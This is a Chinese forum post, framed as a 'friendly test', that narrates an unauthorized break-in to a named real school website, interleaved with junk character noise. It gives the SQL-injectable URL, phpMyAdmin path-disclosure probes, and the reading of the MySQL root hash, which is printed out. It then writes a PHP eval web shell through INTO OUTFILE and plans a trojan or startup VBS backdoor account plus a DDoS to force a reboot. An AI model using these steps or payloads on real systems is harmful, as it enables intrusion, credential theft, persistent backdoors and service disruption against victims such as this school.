友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

8 ]/ @) |% n, j2 T6 G. F) K: K
1 C9 c8 B/ \0 S( a3 Y2 x: ]; B
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
1 g" V; B2 k- b; `  g
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
- E0 m- x. d# L+ g- k  z2./phpMyAdmin/phpinfo.php  
8 l% ^" h! H/ |- W3 N9 n3./load_file()  
2 U# I7 ?0 F, @9 J2 r& ^6 [4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
' g# v; z- U- I- l0 t5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7 p1 O8 p* m) a8 S. ]7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

  M+ U$ A2 K' L( ?! v9 j均不行...........................
6 P* Q. P3 L$ Q$ U4 C
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
# o5 R( W6 {6 x1 x  U
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
" i- J2 F" h+ L
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

) Y- j; t, G5 R. xhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

/ P' X$ W4 P  V$ U) }$ q2 a自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

, H7 r; p' {6 x+ y0 x- M; d6 z成功读到root密码：
9 O' @/ e8 m/ T
0 ?, V7 v6 M( k, ~9 @( C' R* S17---- r(0072)
1 G4 l" m; k0 e: l) S, k' m4 d18---- o(006f)
9 j) a4 Z% H3 a6 q; H19---- o(006f)
20---- t(0074)
1 k" H% f) k* c" \  C, a21---- *(002a)
& [- g+ T% u' }9 g2 b" r, e22---- 8(0038)
23---- 2(0032)
6 S1 _; l8 o( w/ g24---- E(0045)
25---- 1(0031)
4 |% }0 s& i7 D, u26---- C(0043)
27---- 5(0035)
0 ~. ~& T( g$ y9 p/ B: T28---- 8(0038)
0 C' a0 w( u+ t4 m5 f; R# R7 h" n29---- 2(0032)
30---- 8(0038)
31---- A(0041)
5 b/ c1 `7 s; a; R7 M% f! M, x+ ]32---- 9(0039)
33---- B(0042)
2 I- I' C) E* g/ ]( s" q34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
) h$ T  U7 Q3 _( U37---- 6(0036)
5 F: A( ?9 J* c8 q  k' |! n& Y! K8 b38---- 4(0034)
6 f* V; T2 ?$ F* y$ u% o* L39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
- v7 I0 F/ c/ `6 B! u5 e: _0 U42---- 5(0035)
43---- 3(0033)
  A; l. I; d4 ]9 _" r2 l) k. q44---- 5(0035)
; w) k/ E3 g: x45---- 9(0039)
2 ^& r: s+ {* j46---- 8(0038)
6 t: {: `+ V% v4 Z4 H+ q47---- F(0046)
48---- F(0046)
49---- 4(0034)
# y7 V8 k9 M1 _( ]50---- F(0046)
) H8 u3 o* f( o( }8 |6 a51---- 0(0030)
1 m: N* E3 {+ @: x' q# h- D* a5 L+ k52---- 3(0033)
' n4 ]$ \5 g/ ]53---- 2(0032)
! _* A+ _! ~# @3 \54---- A(0041)
55---- 4(0034)
2 T4 e" T4 r" V# f+ K: y56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
( d. C, K" Z. G( v) Z2 x, G& D60---- *(0041)
  F  `% v# g  `8 n# _& `6 T3 |61---- *0032)

解密后成功登陆phpmyamin
& i8 T. r- D$ J( `& [7 ~$ m8 x6 m                          
8 l! f. B7 K6 T6 o, C! H
                             
6 @$ L3 u* g7 [' G8 t& t0 X2 f
& p6 i5 D' [' m# M0 ?, c9 Q0 u找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
6 H+ {( W' ?0 q" Q
成功执行，拿下shell，菜刀连接：
6 ?% C* \% [( ?) o$ P! ]
5 K% P/ [4 l# m1 `+ y+ \服务器不支持asp,aspx,php提权无果...................
" o# P0 q2 `. `
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

' @( s* |6 g  h. E/ A

成员

. M6 n2 x) r3 h# s

-------------------------------------------------------------------------------
admin
Administrator
$ m& q+ P# [+ @4 d/ I7 Wslipper$
0 ^0 {7 S9 R+ ?6 Qsqluser
命令成功完成。

/ z# i" x0 }: v) K: a; V2 }: g服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
5 y" p/ D1 X4 c. `, ^4 R
' D" h9 F$ c& [: i2 R* G- j3 I$ ]2 \ddos服务器重启，不然就只能坐等服务器重启了...............................
  Z' a! B+ r! z5 J/ `& Y; F
      

angel